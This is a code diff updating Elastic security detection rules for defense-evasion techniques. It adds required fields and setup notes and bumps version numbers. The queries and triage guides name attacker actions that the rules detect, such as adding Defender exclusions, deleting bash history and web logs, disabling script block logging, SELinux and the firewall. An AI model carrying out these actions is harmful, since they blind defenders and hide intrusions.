path, retrieve the file(s) and determine if malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives due to how often network administrators legitimately configure\nexclusions. In order to validate the activity further, review the specific exclusion and its intent. There are many\nlegitimate reasons for exclusions, so it's important to gain context.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Exclusion lists for antimalware capabilities should always be routinely monitored for review.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")) and\n process.args : (\"*Add-MpPreference*\", \"*Set-MpPreference*\") and\n process.args : (\"*-Exclusion*\")\n", "references": [ "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -80,5 +103,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_delete_volume_usn_journal_with_fsutil.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_delete_volume_usn_journal_with_fsutil.json index 5cc8aa2dcf109..ce1f469dceb73 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_delete_volume_usn_journal_with_fsutil.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_delete_volume_usn_journal_with_fsutil.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Delete Volume USN Journal with Fsutil", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"fsutil.exe\" or process.pe.original_file_name == \"fsutil.exe\") and \n process.args : \"deletejournal\" and process.args : \"usn\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"fsutil.exe\" or process.pe.original_file_name == \"fsutil.exe\") and\n process.args : \"deletejournal\" and process.args : \"usn\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "f675872f-6d85-40a3-b502-c0d2ef101e92", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deleting_websvr_access_logs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deleting_websvr_access_logs.json index 9ae0b9f5ec2a2..5fe1cbafbe3e0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deleting_websvr_access_logs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deleting_websvr_access_logs.json @@ -13,10 +13,23 @@ "language": "eql", "license": "Elastic License v2", "name": "WebServer Access Logs Deleted", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type == \"deletion\" and\n file.path : (\"C:\\\\inetpub\\\\logs\\\\LogFiles\\\\*.log\", \n \"/var/log/apache*/access.log\",\n \"/etc/httpd/logs/access_log\", \n \"/var/log/httpd/access_log\", \n \"/var/www/*/logs/access.log\")\n", + "note": "", + "query": "file where event.type == \"deletion\" and\n file.path : (\"C:\\\\inetpub\\\\logs\\\\LogFiles\\\\*.log\",\n \"/var/log/apache*/access.log\",\n \"/etc/httpd/logs/access_log\",\n \"/var/log/httpd/access_log\",\n \"/var/www/*/logs/access.log\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deletion_of_bash_command_line_history.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deletion_of_bash_command_line_history.json index 7564c5adbae05..9d951af198ab1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deletion_of_bash_command_line_history.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deletion_of_bash_command_line_history.json @@ -11,10 +11,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Tampering of Bash Command-Line History", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (\n ((process.args : (\"rm\", \"echo\") or\n (process.args : \"ln\" and process.args : \"-sf\" and process.args : \"/dev/null\") or\n (process.args : \"truncate\" and process.args : \"-s0\"))\n and process.args : (\".bash_history\", \"/root/.bash_history\", \"/home/*/.bash_history\",\"/Users/.bash_history\", \"/Users/*/.bash_history\",\n \".zsh_history\", \"/root/.zsh_history\", \"/home/*/.zsh_history\", \"/Users/.zsh_history\", \"/Users/*/.zsh_history\")) or\n (process.name : \"history\" and process.args : \"-c\") or\n (process.args : \"export\" and process.args : (\"HISTFILE=/dev/null\", \"HISTFILESIZE=0\")) or\n (process.args : \"unset\" and process.args : \"HISTFILE\") or\n (process.args : \"set\" and process.args : \"history\" and process.args : \"+o\")\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_posh_scriptblocklogging.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_posh_scriptblocklogging.json index 32f71856adf56..8f52b98e15cc8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_posh_scriptblocklogging.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_posh_scriptblocklogging.json @@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "PowerShell Script Block Logging Disabled", - "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making\nit available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it\nprocesses, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where event.type == \"change\" and\n registry.path : \n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n and registry.data.strings : (\"0\", \"0x00000000\")\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making\nit available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it\nprocesses, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "registry where event.type == \"change\" and\n registry.path :\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n and registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "818e23e6-2094-4f0e-8c01-22d30f3506c6", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_selinux_attempt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_selinux_attempt.json index cc84001428ff0..22edd7cf26cde 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_selinux_attempt.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_selinux_attempt.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "Potential Disabling of SELinux", "query": "event.category:process and event.type:(start or process_started) and process.name:setenforce and process.args:0\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e", "severity": "medium", @@ -48,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_windows_firewall_rules_with_netsh.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_windows_firewall_rules_with_netsh.json index 6cb54ed9c048c..ad91233e10fec 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_windows_firewall_rules_with_netsh.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_windows_firewall_rules_with_netsh.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Disable Windows Firewall Rules via Netsh", - "note": "## Triage and analysis\n\n### Investigating Disable Windows Firewall Rules via Netsh\n\nThe Windows Defender Firewall is a native component which provides host-based, two-way network traffic filtering for a\ndevice, and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing\ntroubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Firewall Rules via Netsh\n\nThe Windows Defender Firewall is a native component which provides host-based, two-way network traffic filtering for a\ndevice, and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing\ntroubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"netsh.exe\" and\n (process.args : \"disable\" and process.args : \"firewall\" and process.args : \"set\") or\n (process.args : \"advfirewall\" and process.args : \"off\" and process.args : \"state\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_defender_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_defender_powershell.json index 588e4246a7886..1ac7233e48247 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_defender_powershell.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_defender_powershell.json @@ -15,13 +15,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Disabling Windows Defender Security Settings via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Disabling Windows Defender Security Settings via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the execution of commands that can tamper the Windows Defender antivirus features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which action was executed. Based on that, examine exceptions, antivirus state,\nsample submission, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Based on the command line, take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Disabling Windows Defender Security Settings via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the execution of commands that can tamper the Windows Defender antivirus features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which action was executed. Based on that, examine exceptions, antivirus state,\nsample submission, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Based on the command line, take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")) and\n process.args : \"Set-MpPreference\" and process.args : (\"-Disable*\", \"Disabled\", \"NeverSend\", \"-Exclusion*\")\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2019-ps" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_logs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_logs.json index 74d28465bf9d8..98aaff809825f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_logs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_logs.json @@ -14,14 +14,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Disable Windows Event and Security Logs Using Built-in Tools", - "note": "## Triage and analysis\n\n### Investigating Disable Windows Event and Security Logs Using Built-in Tools\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries\ncan tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the usage of different utilities to disable the EventLog service or specific event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- 